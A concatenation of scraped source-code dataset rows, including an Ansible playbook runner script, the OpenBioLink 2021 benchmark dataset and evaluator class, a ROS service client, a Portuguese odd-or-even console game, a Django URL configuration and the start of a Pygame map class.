        import ansible_runner
        # reload() is the Python 2 builtin; it forces ansible_runner to pick
        # up the environment variables set above on every invocation.
        reload(ansible_runner)
        # Dropped support for observer_pretend - to be redone
        runner = ansible_runner.Runner(
            playbook=fqp, run_data=opts, host_file=ansible_hosts
        )
        stats, aresults = runner.run()
    except Exception as e:
        # Any failure (env handling, import, playbook run) is reported back
        # to the parent process as data rather than raised.
        return {"stats": None, "aresults": None, "exception": traceback.format_exc()}
    return {"stats": stats, "aresults": aresults}
def main():
    # Invoked as: ansible_main.py <pickled-args-file> <result-file>.
    input_fn = sys.argv[1]
    result_fn = sys.argv[2]
    # The parent synchronizer pickles everything this subprocess needs.
    args = pickle.loads(open(input_fn).read())
    Config.init(args["config_file"], "synchronizer-config-schema.yaml")
    ansible_hosts = args["ansible_hosts"]
    ansible_config = args["ansible_config"]
    fqp = args["fqp"]
    opts = args["opts"]
    result = run_playbook(ansible_hosts, ansible_config, fqp, opts)
    # Hand the outcome back to the parent process via the result file.
    open(result_fn, "w").write(pickle.dumps(result))
if __name__ == "__main__":
    main()
| # Copyright 2017-present Open Networking Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import pickle
import sys
# import json
import traceback
from xosconfig import Config
sys.path.append("/opt/xos")
def run_playbook(ansible_hosts, ansible_config, fqp, opts):
try:
if ansible_config:
os.environ["ANSIBLE_CONFIG"] = ansible_config
else:
try:
del os.environ["ANSIBLE_CONFIG"]
except KeyError:
pass
if ansible_hosts:
os.environ["ANSIBLE_HOSTS"] = ansible_hosts
else:
try:
del os.environ["ANSIBLE_HOSTS"]
except KeyError:
pass
import ansible_runner
reload(ansible_runner)
# Dropped support for observer_pretend - to be redone
runner = ansible_runner.Runner(
playbook=fqp, run_data=opts, host_file=ansible_hosts
)
stats, aresults = runner.run()
except Exception as e:
return {"stats": None, "aresults": None, "exception": traceback.format_exc()}
return {"stats": stats, "aresults": aresults}
def main():
input_fn = sys.argv[1]
result_fn = sys.argv[2]
args = pickle.loads(open(input_fn).read())
Config.init(args["config_file"], "synchronizer-config-schema.yaml")
ansible_hosts = args["ansible_hosts"]
ansible_config = args["ansible_config"]
fqp = args["fqp"]
opts = args["opts"]
result = run_playbook(ansible_hosts, ansible_config, fqp, opts)
open(result_fn, "w").write(pickle.dumps(result))
if __name__ == "__main__":
main() | en | 0.833103 | # Copyright 2017-present Open Networking Foundation # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import json # Dropped support for observer_pretend - to be redone | 1.833689 | 2 |
src/openbiolink/obl2021/obl2021.py | nomisto/OpenBioLink | 97 | 6623883 | <filename>src/openbiolink/obl2021/obl2021.py
import os
import pickle
import urllib
import zipfile
from os import path
from typing import cast, Iterable, Tuple
import numpy as np
import pandas as pd
import torch
from openbiolink.utils import split_list_in_batches_iter
from tqdm import tqdm
from openbiolink.graph_creation.file_downloader import FileDownloader
class OBL2021Dataset(object):
    """OpenBioLink 2021 benchmark dataset (downloads on first use).

    Args:
        root: Pathlike string to directory in which dataset files should be stored
    """

    def __init__(self, root: str = 'obl2021'):
        self._dataset_path = root
        self._url = r"https://zenodo.org/record/5361324/files/KGID_HQ_DIR.zip"
        self._download()
        self._entity_label_to_id = None
        self._id_to_entity_label = None
        self._relation_label_to_id = None
        self._id_to_relation_label = None
        # entities.tsv / relations.tsv: column 0 = numeric id, column 1 = label.
        node_mapping = pd.read_csv(os.path.join(self._dataset_path, "entities.tsv"), sep="\t", header=None)
        self._entity_label_to_id = {label: id for label, id in
                                    zip(node_mapping[1], node_mapping[0])}
        self._id_to_entity_label = {
            id: label
            for label, id in self._entity_label_to_id.items()
        }
        relation_mapping = pd.read_csv(os.path.join(self._dataset_path, "relations.tsv"), sep="\t", header=None)
        self._relation_label_to_id = {label: id for label, id in
                                      zip(relation_mapping[1],
                                          relation_mapping[0])}
        self._id_to_relation_label = {
            id: label
            for label, id in self._relation_label_to_id.items()
        }
        self._training = self._load(os.path.join(self._dataset_path, "train.tsv"))
        self._validation = self._load(os.path.join(self._dataset_path, "valid.tsv"))
        self._testing = self._load(os.path.join(self._dataset_path, "test.tsv"))
        self._num_entities = len(self._entity_label_to_id)
        self._num_relations = len(self._relation_label_to_id)
        # Precomputed maps of known true heads/tails, used for filtered ranking.
        with open(os.path.join(self._dataset_path, '_dict_of_heads.pkl'), 'rb') as f:
            self._dict_of_heads = pickle.load(f)
        with open(os.path.join(self._dataset_path, '_dict_of_tails.pkl'), 'rb') as f:
            self._dict_of_tails = pickle.load(f)

    def _download(self):
        """Fetch and unzip the dataset archive unless `root` already has files."""
        # FIX: the module top only does `import urllib`, which does not bind
        # the `request` submodule; bind it explicitly before use.
        import urllib.request
        if not path.isdir(self._dataset_path):
            os.mkdir(self._dataset_path)
        # check if exists
        if not path.isdir(self._dataset_path) or not os.listdir(self._dataset_path):
            print(
                f"Dataset not found, downloading to {os.path.abspath(self._dataset_path)} ...")
            url = self._url
            filename = url.split('/')[-1]
            with tqdm(unit='B', unit_scale=True, unit_divisor=1024, miniters=1, desc=filename) as t:
                zip_path, _ = urllib.request.urlretrieve(url, reporthook=FileDownloader.download_progress_hook(t))
            with zipfile.ZipFile(zip_path, "r") as f:
                f.extractall(self._dataset_path)
        else:
            print(f"Dataset found in {os.path.abspath(self._dataset_path)}, omitting download...")

    def _load(self, path_):
        """Read the first three columns of a tab-separated triple file into a tensor."""
        with open(path_) as file:
            df = pd.read_csv(
                file,
                usecols=[0, 1, 2],
                header=None,
                sep="\t",
            )
        return torch.tensor(df.values)

    @property
    def num_entities(self) -> int:
        """Number of entities in the dataset"""
        return self._num_entities

    @property
    def num_relations(self) -> int:
        """Number of relations in the dataset"""
        return self._num_relations

    @property
    def training(self) -> torch.Tensor:
        """Set of training triples. Shape `(num_train, 3)`"""
        return self._training

    @property
    def testing(self) -> torch.Tensor:
        """Set of test triples. Shape `(num_test, 3)`"""
        return self._testing

    @property
    def validation(self) -> torch.Tensor:
        """Set of validation triples. Shape `(num_val, 3)`"""
        return self._validation

    @property
    def candidates(self) -> torch.Tensor:
        """Set of unfiltered candidates that can substitute for `?` in `(h,r,?)` and `(?,r,t)`. Shape (num_entities,)"""
        return torch.arange(self.num_entities).long()

    @property
    def stats(self) -> str:
        """Human-readable summary of triple counts and graph size."""
        msg = "# Triples: ".ljust(15) + "\n"
        msg = msg + "".ljust(5) + "Train ".ljust(6) + str(self.training.size()[0]) + "\n"
        msg = msg + "".ljust(5) + "Valid ".ljust(6) + str(self.validation.size()[0]) + "\n"
        msg = msg + "".ljust(5) + "Test ".ljust(6) + str(self._testing.size()[0]) + "\n"
        msg = msg + "# Relations: ".ljust(15) + str(self.num_relations) + "\n"
        msg = msg + "# Entities: ".ljust(15) + str(self.num_entities) + "\n"
        return msg

    def filter_scores(self, batch, scores, filter_col, filter_val=float('-Inf')) -> torch.Tensor:
        """
        Filter scores by setting true scores to `filter_val`.
        For simplicity, only the head-side is described, i.e. filter_col=0. The tail-side is processed alike.
        For each (h, r, t) triple in the batch, the entity identifiers are computed such that (h', r, t) exists in all
        positive triples.
        Args:
            batch: Batch of triples. Shape `(batch_size,3)`
            scores: The scores for all corrupted triples (including the currently considered true triple). Are modified *in-place*. Shape `(batch_size,num_entities)`
            filter_col: The column along which to filter. Allowed are {0, 2}, where 0 corresponds to filtering head-based and 2
                corresponds to filtering tail-based.
            filter_val: Value to which scores of already known triples are set, default -Inf
        Returns:
            A reference to the filtered scores, which have been updated in-place.
        """
        for i in range(batch.size()[0]):
            if filter_col == 0:
                # All known true heads for (r, t), minus the current triple's head.
                true_targets = self._dict_of_heads[batch[i, 2].item(), batch[i, 1].item()].copy()
                true_targets.remove(batch[i, 0].item())
                true_targets = torch.tensor(list(true_targets)).long()
            else:
                # All known true tails for (h, r), minus the current triple's tail.
                true_targets = self._dict_of_tails[batch[i, 0].item(), batch[i, 1].item()].copy()
                true_targets.remove(batch[i, 2].item())
                true_targets = torch.tensor(list(true_targets)).long()
            scores[i][true_targets] = filter_val
        return scores

    def get_test_batches(self, batch_size=100) -> Tuple[int, Iterable[torch.Tensor]]:
        """Splits the test set into batches of fixed size
        Args:
            batch_size: Size of a batch
        Returns:
            A tuple containing the number of batches and an iterable to the batches.
        """
        num_bat = int(np.ceil(len(self._testing) / batch_size))
        return num_bat, cast(Iterable[torch.Tensor],
                             split_list_in_batches_iter(input_list=self._testing, batch_size=batch_size))
class OBL2021Evaluator:
    """Scores top-10 head/tail predictions against the OBL2021 test set."""

    def eval(self, h_pred_top10, t_pred_top10, triples, save_submission=True):
        """
        Evaluate ranked top-10 head and tail predictions for a set of evaluation
        triples and, by default, write a submission file.
        Args:
            h_pred_top10: Top 10 head predictions; (i,j) is the predicted head with rank j+1 for triples[i]. Shape `(num_eval_triplets,10)`
            t_pred_top10: Top 10 tail predictions; (i,j) is the predicted tail with rank j+1 for triples[i]. Shape `(num_eval_triplets,10)`
            triples: Set of evaluation triples. Shape `(num_eval_triplets,3)`
            save_submission: If true a submission file is created. Default: True
        """
        assert t_pred_top10.shape[1] == h_pred_top10.shape[1] == 10 and t_pred_top10.shape[0] == h_pred_top10.shape[0] == triples.shape[0]
        # Tail-side queries (h, r -> t) first, then head-side; this ordering is
        # what the submission file format expects.
        tail_top10 = self._to_torch(t_pred_top10)
        head_top10 = self._to_torch(h_pred_top10)
        tail_truth = self._to_torch(triples[:, 2])
        head_truth = self._to_torch(triples[:, 0])
        pred_top10 = torch.cat((tail_top10, head_top10), dim=0)
        correct_index = torch.cat((tail_truth, head_truth), dim=0)
        h10 = self._calculate_h10(correct_index.to(pred_top10.device), pred_top10)
        if save_submission is True:
            self._save_test_submission(pred_top10)
            print("Please copy also the following line in the respective field of the submission form:")
            print({'h10': h10})

    def _to_torch(self, container):
        # Tensors pass through untouched; numpy arrays are wrapped without a copy.
        if isinstance(container, torch.Tensor):
            return container
        return torch.from_numpy(container)

    def _calculate_mrr(self, correct_index, pred_top10):
        """Mean reciprocal rank; ranks beyond the top 10 contribute 0."""
        hits = torch.nonzero(correct_index.view(-1, 1) == pred_top10, as_tuple=False)
        recip = torch.zeros(len(correct_index)).to(hits.device)
        recip[hits[:, 0]] = 1. / (hits[:, 1].float() + 1.)
        return float(recip.mean().item())

    def _calculate_h10(self, correct_index, pred_top10):
        """Fraction of queries whose true entity appears among the top 10."""
        in_top10 = torch.any(correct_index.view(-1, 1) == pred_top10, dim=1)
        return float(torch.sum(in_top10) / correct_index.shape[0])

    def _save_test_submission(self, pred_top10):
        assert (pred_top10.shape == (361928, 10)), "Shape not (361928, 10) but " + str(pred_top10.shape)
        if isinstance(pred_top10, torch.Tensor):
            pred_top10 = pred_top10.cpu().numpy()
        pred_top10 = pred_top10.astype(np.int32)
        filename = os.path.abspath('pred_OBL2021')
        np.savez_compressed(filename, pred_top10=pred_top10)
        print("Submission file saved here: " + filename + ".npz")
| <filename>src/openbiolink/obl2021/obl2021.py
import os
import pickle
import urllib
import zipfile
from os import path
from typing import cast, Iterable, Tuple
import numpy as np
import pandas as pd
import torch
from openbiolink.utils import split_list_in_batches_iter
from tqdm import tqdm
from openbiolink.graph_creation.file_downloader import FileDownloader
class OBL2021Dataset(object):
"""
Args:
root: Pathlike string to directory in which dataset files should be stored
"""
def __init__(self, root: str = 'obl2021'):
self._dataset_path = root
self._url = r"https://zenodo.org/record/5361324/files/KGID_HQ_DIR.zip"
self._download()
self._entity_label_to_id = None
self._id_to_entity_label = None
self._relation_label_to_id = None
self._id_to_relation_label = None
node_mapping = pd.read_csv(os.path.join(self._dataset_path, "entities.tsv"), sep="\t", header=None)
self._entity_label_to_id = {label: id for label, id in
zip(node_mapping[1], node_mapping[0])}
self._id_to_entity_label = {
id: label
for label, id in self._entity_label_to_id.items()
}
relation_mapping = pd.read_csv(os.path.join(self._dataset_path, "relations.tsv"), sep="\t", header=None)
self._relation_label_to_id = {label: id for label, id in
zip(relation_mapping[1],
relation_mapping[0])}
self._id_to_relation_label = {
id: label
for label, id in self._relation_label_to_id.items()
}
self._training = self._load(os.path.join(self._dataset_path, "train.tsv"))
self._validation = self._load(os.path.join(self._dataset_path, "valid.tsv"))
self._testing = self._load(os.path.join(self._dataset_path, "test.tsv"))
self._num_entities = len(self._entity_label_to_id)
self._num_relations = len(self._relation_label_to_id)
with open(os.path.join(self._dataset_path, '_dict_of_heads.pkl'), 'rb') as f:
self._dict_of_heads = pickle.load(f)
with open(os.path.join(self._dataset_path, '_dict_of_tails.pkl'), 'rb') as f:
self._dict_of_tails = pickle.load(f)
def _download(self):
if not path.isdir(self._dataset_path):
os.mkdir(self._dataset_path)
# check if exists
if not path.isdir(self._dataset_path) or not os.listdir(self._dataset_path):
print(
f"Dataset not found, downloading to {os.path.abspath(self._dataset_path)} ...")
url = self._url
filename = url.split('/')[-1]
with tqdm(unit='B', unit_scale=True, unit_divisor=1024, miniters=1, desc=filename) as t:
zip_path, _ = urllib.request.urlretrieve(url, reporthook=FileDownloader.download_progress_hook(t))
with zipfile.ZipFile(zip_path, "r") as f:
f.extractall(self._dataset_path)
else:
print(f"Dataset found in {os.path.abspath(self._dataset_path)}, omitting download...")
def _load(self, path_):
with open(path_) as file:
df = pd.read_csv(
file,
usecols=[0, 1, 2],
header=None,
sep="\t",
)
return torch.tensor(df.values)
@property
def num_entities(self) -> int:
"""Number of entities in the dataset"""
return self._num_entities
@property
def num_relations(self) -> int:
"""Number of relations in the dataset"""
return self._num_relations
@property
def training(self) -> torch.Tensor:
"""Set of training triples. Shape `(num_train, 3)`"""
return self._training
@property
def testing(self) -> torch.Tensor:
"""Set of test triples. Shape `(num_test, 3)`"""
return self._testing
@property
def validation(self) -> torch.Tensor:
"""Set of validation triples. Shape `(num_val, 3)`"""
return self._validation
@property
def candidates(self) -> torch.Tensor:
"""Set of unfiltered candidates that can substitute for `?` in `(h,r,?)` and `(?,r,t)`. Shape (num_entities,)"""
return torch.arange(self.num_entities).long()
@property
def stats(self) -> str:
msg = "# Triples: ".ljust(15) + "\n"
msg = msg + "".ljust(5) + "Train ".ljust(6) + str(self.training.size()[0]) + "\n"
msg = msg + "".ljust(5) + "Valid ".ljust(6) + str(self.validation.size()[0]) + "\n"
msg = msg + "".ljust(5) + "Test ".ljust(6) + str(self._testing.size()[0]) + "\n"
msg = msg + "# Relations: ".ljust(15) + str(self.num_relations) + "\n"
msg = msg + "# Entities: ".ljust(15) + str(self.num_entities) + "\n"
return msg
def filter_scores(self, batch, scores, filter_col, filter_val=float('-Inf')) -> torch.Tensor:
"""
Filter scores by setting true scores to `filter_val`.
For simplicity, only the head-side is described, i.e. filter_col=0. The tail-side is processed alike.
For each (h, r, t) triple in the batch, the entity identifiers are computed such that (h', r, t) exists in all
positive triples.
Args:
batch: Batch of triples. Shape `(batch_size,3)`
scores: The scores for all corrupted triples (including the currently considered true triple). Are modified *in-place*. Shape `(batch_size,num_entities)`
filter_col: The column along which to filter. Allowed are {0, 2}, where 0 corresponds to filtering head-based and 2
corresponds to filtering tail-based.
filter_val: Value to which scores of already known triples are set, default -Inf
Returns:
A reference to the filtered scores, which have been updated in-place.
"""
for i in range(batch.size()[0]):
if filter_col == 0:
true_targets = self._dict_of_heads[batch[i, 2].item(), batch[i, 1].item()].copy()
true_targets.remove(batch[i, 0].item())
true_targets = torch.tensor(list(true_targets)).long()
else:
true_targets = self._dict_of_tails[batch[i, 0].item(), batch[i, 1].item()].copy()
true_targets.remove(batch[i, 2].item())
true_targets = torch.tensor(list(true_targets)).long()
scores[i][true_targets] = filter_val
return scores
def get_test_batches(self, batch_size=100) -> Tuple[int, Iterable[torch.Tensor]]:
"""Splits the test set into batches of fixed size
Args:
batch_size: Size of a batch
Returns:
A tuple containing the number of batches and an iterable to the batches.
"""
num_bat = int(np.ceil(len(self._testing) / batch_size))
return num_bat, cast(Iterable[torch.Tensor],
split_list_in_batches_iter(input_list=self._testing, batch_size=batch_size))
class OBL2021Evaluator:
def eval(self, h_pred_top10, t_pred_top10, triples, save_submission=True):
"""
Evaluates ranked lists of head and tail entity predictions for a set of evaluation triples. By default creates a submission file.
Args:
h_pred_top10: Top 10 predictions for the head entity. The value at (i,j) is the ID of the predicted head entity with rank `j+1` for the triple `triples[i]`. Shape `(num_eval_triplets,10)`
t_pred_top10: Top 10 predictions for the tail entity. The value at (i,j) is the ID of the predicted tail entity with rank `j+1` for the triple `triples[i]`. Shape `(num_eval_triplets,10)`
triples: Set of evaluation triples. Shape `(num_eval_triplets,3)`
save_submission: If true a submission file is created. Default: True
"""
assert t_pred_top10.shape[1] == h_pred_top10.shape[1] == 10 and t_pred_top10.shape[0] == h_pred_top10.shape[
0] == triples.shape[0]
# h,r->t
t_pred_top10 = self._to_torch(t_pred_top10)
t_correct_index = self._to_torch(triples[:, 2])
h_pred_top10 = self._to_torch(h_pred_top10)
h_correct_index = self._to_torch(triples[:, 0])
pred_top10 = torch.cat((t_pred_top10, h_pred_top10), dim=0)
correct_index = torch.cat((t_correct_index, h_correct_index), dim=0)
h10 = self._calculate_h10(correct_index.to(pred_top10.device), pred_top10)
if save_submission is True:
self._save_test_submission(pred_top10)
print("Please copy also the following line in the respective field of the submission form:")
print({'h10': h10})
def _to_torch(self, container):
if not isinstance(container, torch.Tensor):
container = torch.from_numpy(container)
return container
def _calculate_mrr(self, correct_index, pred_top10):
# extract indices where correct_index is within top10
tmp = torch.nonzero(correct_index.view(-1, 1) == pred_top10, as_tuple=False)
# reciprocal rank
# if rank is larger than 10, then set the reciprocal rank to 0.
rr = torch.zeros(len(correct_index)).to(tmp.device)
rr[tmp[:, 0]] = 1. / (tmp[:, 1].float() + 1.)
# mean reciprocal rank
return float(rr.mean().item())
def _calculate_h10(self, correct_index, pred_top10):
# extract indices where correct_index is within top10
total_h10 = torch.sum(torch.any(correct_index.view(-1, 1) == pred_top10, dim=1))
return float(total_h10 / correct_index.shape[0])
def _save_test_submission(self, pred_top10):
assert (pred_top10.shape == (361928, 10)), "Shape not (361928, 10) but " + str(pred_top10.shape)
if isinstance(pred_top10, torch.Tensor):
pred_top10 = pred_top10.cpu().numpy()
pred_top10 = pred_top10.astype(np.int32)
filename = os.path.abspath('pred_OBL2021')
np.savez_compressed(filename, pred_top10=pred_top10)
print("Submission file saved here: " + filename + ".npz")
| en | 0.831411 | Args: root: Pathlike string to directory in which dataset files should be stored # check if exists Number of entities in the dataset Number of relations in the dataset Set of training triples. Shape `(num_train, 3)` Set of test triples. Shape `(num_test, 3)` Set of validation triples. Shape `(num_val, 3)` Set of unfiltered candidates that can substitute for `?` in `(h,r,?)` and `(?,r,t)`. Shape (num_entities,) Filter scores by setting true scores to `filter_val`. For simplicity, only the head-side is described, i.e. filter_col=0. The tail-side is processed alike. For each (h, r, t) triple in the batch, the entity identifiers are computed such that (h', r, t) exists in all positive triples. Args: batch: Batch of triples. Shape `(batch_size,3)` scores: The scores for all corrupted triples (including the currently considered true triple). Are modified *in-place*. Shape `(batch_size,num_entities)` filter_col: The column along which to filter. Allowed are {0, 2}, where 0 corresponds to filtering head-based and 2 corresponds to filtering tail-based. filter_val: Value to which scores of already known triples are set, default -Inf Returns: A reference to the filtered scores, which have been updated in-place. Splits the test set into batches of fixed size Args: batch_size: Size of a batch Returns: A tuple containing the number of batches and an iterable to the batches. Evaluates ranked lists of head and tail entity predictions for a set of evaluation triples. By default creates a submission file. Args: h_pred_top10: Top 10 predictions for the head entity. The value at (i,j) is the ID of the predicted head entity with rank `j+1` for the triple `triples[i]`. Shape `(num_eval_triplets,10)` t_pred_top10: Top 10 predictions for the tail entity. The value at (i,j) is the ID of the predicted tail entity with rank `j+1` for the triple `triples[i]`. Shape `(num_eval_triplets,10)` triples: Set of evaluation triples. 
Shape `(num_eval_triplets,3)` save_submission: If true a submission file is created. Default: True # h,r->t # extract indices where correct_index is within top10 # reciprocal rank # if rank is larger than 10, then set the reciprocal rank to 0. # mean reciprocal rank # extract indices where correct_index is within top10 | 2.300762 | 2 |
rol_server/scripts/rol_client.py | LCAS/RFID | 0 | 6623884 | #!/usr/bin/env python
import rospy
from std_msgs.msg import String
#from rol_server.srv import findObject, findObjectRequest, findObjectResponse
from hmi_bridge.srv import findObject, findObjectRequest, findObjectResponse
# Node class.
class rol_client():
    """Exercises the rol_server findObject service with a fixed demo sequence."""

    # Visual separator between demo requests in the log output.
    _SEP = '................................................................................................'

    # (action, payload) pairs issued once at start-up, in this order.
    _DEMO_CALLS = [
        ('list', 'objects'),
        ('list', 'locations'),
        ('list', 'sublocations'),
        ('find', 'tape holder'),
        ('accurate_find', 'tape holder'),
        ('find', 'remote'),
        ('accurate_find', 'tape holder'),
    ]

    def __init__(self):
        rospy.loginfo('Waiting for Server to be active')
        rospy.wait_for_service('rol_server')
        self.callService = rospy.ServiceProxy('rol_server', findObject)
        # Fixes: an unused local (`sleepTime = rospy.Duration(1, 0)`) was
        # removed, and the 7 copy-pasted call/separator pairs collapsed
        # into one data-driven loop (same calls, same order, same output).
        for action, payload in self._DEMO_CALLS:
            self.op(action, payload)
            rospy.loginfo(self._SEP)

    def op(self, action, payload):
        """Call the service once and log success (response) or failure (feedback)."""
        resp1 = self.callService(action, payload)
        if resp1.wasOk:
            rospy.loginfo('Request was correct.')
            rospy.loginfo(action + '(' + payload + '): is (' + resp1.response + ')')
        else:
            rospy.loginfo('Request was incorrect')
            rospy.loginfo('error is (' + resp1.feedback + ')')
# Main function.
if __name__ == '__main__':
    # Initialize the node and name it.
    rospy.init_node('rol_client_node')
    # Go to class functions that do all the heavy lifting. Do error checking.
    try:
        rc = rol_client()
    # A Ctrl-C while waiting for the service raises ROSInterruptException;
    # exiting quietly is the intended behaviour here, not an error.
    except rospy.ROSInterruptException: pass
| #!/usr/bin/env python
import rospy
from std_msgs.msg import String
#from rol_server.srv import findObject, findObjectRequest, findObjectResponse
from hmi_bridge.srv import findObject, findObjectRequest, findObjectResponse
# Node class.
class rol_client():
def __init__(self):
rospy.loginfo('Waiting for Server to be active')
rospy.wait_for_service('rol_server')
self.callService = rospy.ServiceProxy('rol_server', findObject)
sleepTime = rospy.Duration(1, 0)
self.op('list','objects')
rospy.loginfo('................................................................................................')
self.op('list', 'locations')
rospy.loginfo('................................................................................................')
self.op('list', 'sublocations')
rospy.loginfo('................................................................................................')
self.op('find', 'tape holder')
rospy.loginfo('................................................................................................')
self.op('accurate_find', 'tape holder')
rospy.loginfo('................................................................................................')
self.op('find', 'remote')
rospy.loginfo('................................................................................................')
self.op('accurate_find', 'tape holder')
rospy.loginfo('................................................................................................')
def op(self,action,payload):
resp1 = self.callService(action, payload)
if resp1.wasOk:
rospy.loginfo('Request was correct.')
rospy.loginfo(action+'('+payload+'): is (' + resp1.response + ')')
else:
rospy.loginfo('Request was incorrect')
rospy.loginfo('error is (' + resp1.feedback + ')')
# Main function.
if __name__ == '__main__':
# Initialize the node and name it.
rospy.init_node('rol_client_node')
# Go to class functions that do all the heavy lifting. Do error checking.
try:
rc = rol_client()
except rospy.ROSInterruptException: pass
| en | 0.642802 | #!/usr/bin/env python #from rol_server.srv import findObject, findObjectRequest, findObjectResponse # Node class. # Main function. # Initialize the node and name it. # Go to class functions that do all the heavy lifting. Do error checking. | 2.159183 | 2 |
68jogoParImpar.py | wcalazans81/Mundo_02_Python | 0 | 6623885 | from random import randint
tot = 0
while True:
computador = randint(0, 10)
print('\033[33m=-\033[m'*19)
print('VAMOS JOGAR PAR OU IMPAR!!!')
print('\033[33m=-\033[m'*19)
jogador = int(input('Escolha um número para comaçar: '))
s = computador + jogador
print('\033[34m=-\033[m'*19)
escolha = int(input('Faça sua escolha \033[32m[1] PAR\033[m E \033[33m[2] IMPAR\033[m '))
print('\033[34m=-\033[m'*19)
if escolha == 1 and s % 2 == 0:
print(f'O computador jogou \033[36m{computador}\033[m você jogou \033[35m{jogador}\033[m')
print(f'Deu \033[32m{s}\033[m PAR \033[33mVoce GANHOU!!!\033[m')
elif escolha == 1 and s % 2 == 1:
print(f'O computador jogou \033[36m{computador}\033[m e você jogou \033[35m{jogador}\033[m')
print(f'Deu \033[33m{s}\033[m IMPAR \033[31mVoce PERDEU!!!\033[m')
break
elif escolha == 2 and s % 2 == 0:
print(f'O computador jogou \033[36m{computador}\033[m e você jogou \033[35m{jogador}\033[m')
print(f'Deu \033[33m{s}\033[m PAR \033[31mVoce PERDEU!!!\033[m')
break
elif escolha == 2 and s % 2 == 1:
print(f'O computador jogou \033[36m{computador}\033[me você jogou \033[35m{jogador}\033[m')
print(f'Deu \033[32m{s}\033[m IMPAR \033[33mVoce GANHOU!!!\033[m')
tot += 1
if tot <= 3 :
print(f'Você teve {tot} vitórias. \033[31mVOCÊ PODE SER MELHOR QUE ISSO TETE ME VENCER MAIS VEZES!!!\033[m')
else:
print(f'\033[33mVocê venceu {tot} PARABÉNS VOCÊ É O(a) MELHOR\033[m!!!!!!') | from random import randint
tot = 0
while True:
computador = randint(0, 10)
print('\033[33m=-\033[m'*19)
print('VAMOS JOGAR PAR OU IMPAR!!!')
print('\033[33m=-\033[m'*19)
jogador = int(input('Escolha um número para comaçar: '))
s = computador + jogador
print('\033[34m=-\033[m'*19)
escolha = int(input('Faça sua escolha \033[32m[1] PAR\033[m E \033[33m[2] IMPAR\033[m '))
print('\033[34m=-\033[m'*19)
if escolha == 1 and s % 2 == 0:
print(f'O computador jogou \033[36m{computador}\033[m você jogou \033[35m{jogador}\033[m')
print(f'Deu \033[32m{s}\033[m PAR \033[33mVoce GANHOU!!!\033[m')
elif escolha == 1 and s % 2 == 1:
print(f'O computador jogou \033[36m{computador}\033[m e você jogou \033[35m{jogador}\033[m')
print(f'Deu \033[33m{s}\033[m IMPAR \033[31mVoce PERDEU!!!\033[m')
break
elif escolha == 2 and s % 2 == 0:
print(f'O computador jogou \033[36m{computador}\033[m e você jogou \033[35m{jogador}\033[m')
print(f'Deu \033[33m{s}\033[m PAR \033[31mVoce PERDEU!!!\033[m')
break
elif escolha == 2 and s % 2 == 1:
print(f'O computador jogou \033[36m{computador}\033[me você jogou \033[35m{jogador}\033[m')
print(f'Deu \033[32m{s}\033[m IMPAR \033[33mVoce GANHOU!!!\033[m')
tot += 1
if tot <= 3 :
print(f'Você teve {tot} vitórias. \033[31mVOCÊ PODE SER MELHOR QUE ISSO TETE ME VENCER MAIS VEZES!!!\033[m')
else:
print(f'\033[33mVocê venceu {tot} PARABÉNS VOCÊ É O(a) MELHOR\033[m!!!!!!') | none | 1 | 3.425138 | 3 | |
example/urls.py | komorebitech/django-ses | 0 | 6623886 | try:
from django.conf.urls import *
except ImportError: # django < 1.4
from django.conf.urls.defaults import *
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
url(r'^admin/doc/', include('django.contrib.admindocs.urls')),
url(r'^admin/', include(admin.site.urls)),
url(r'^$', 'views.index', name='index'),
url(r'^send-email/$', 'views.send_email', name='send-email'),
url(r'^reporting/', include('django_ses.urls')),
url(r'^bounce/', 'django_ses.views.handle_bounce', name='handle_bounce'),
)
urlpatterns += staticfiles_urlpatterns()
| try:
from django.conf.urls import *
except ImportError: # django < 1.4
from django.conf.urls.defaults import *
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
url(r'^admin/doc/', include('django.contrib.admindocs.urls')),
url(r'^admin/', include(admin.site.urls)),
url(r'^$', 'views.index', name='index'),
url(r'^send-email/$', 'views.send_email', name='send-email'),
url(r'^reporting/', include('django_ses.urls')),
url(r'^bounce/', 'django_ses.views.handle_bounce', name='handle_bounce'),
)
urlpatterns += staticfiles_urlpatterns()
| it | 0.193785 | # django < 1.4 | 1.70112 | 2 |
casper/kernel/spexpr/explicit.h.py | marcovc/casper | 1 | 6623887 | <filename>casper/kernel/spexpr/explicit.h.py
import util
print "/* THIS FILE WAS AUTOGENERATED FROM explicit_ref.h.py */"
print "#include <casper/kernel/spexpr/expr_wrapper.h>"
print "namespace Casper {"
util.printRel(True)
print "namespace Detail {"
util.printRef(True)
util.printGoal(True)
util.printExprWrapper(True)
print "}"
print "}"
| <filename>casper/kernel/spexpr/explicit.h.py
import util
print "/* THIS FILE WAS AUTOGENERATED FROM explicit_ref.h.py */"
print "#include <casper/kernel/spexpr/expr_wrapper.h>"
print "namespace Casper {"
util.printRel(True)
print "namespace Detail {"
util.printRef(True)
util.printGoal(True)
util.printExprWrapper(True)
print "}"
print "}"
| none | 1 | 1.623408 | 2 | |
classes/mapping.py | ProjetIsn2019/Ethynd | 14 | 6623888 | # -*- coding: utf-8 -*-
"""Les maps
Objet "Tuile" qui correspond a une tuile.
Objet "Map" qui correspond a une carte de tuiles.
Auteur: <NAME> pour correspondre au modèle de carte imaginé par Anthony
"""
from constantes import constantes_tuiles as ct
from constantes import constantes_partie as cp
from constantes import constantes_collisions as cc
from classes import monstre as mstr
from classes import collision as col
import pygame as pg
class Map:
"""Créer une map
Pour créer des maps directement et facilement (Un outil)
Permets de:
- Charger une map (Avec 4 couches de tuiles)
- Afficher une map (Avec les 4 couches de tuiles)
++ Support transparence.
"""
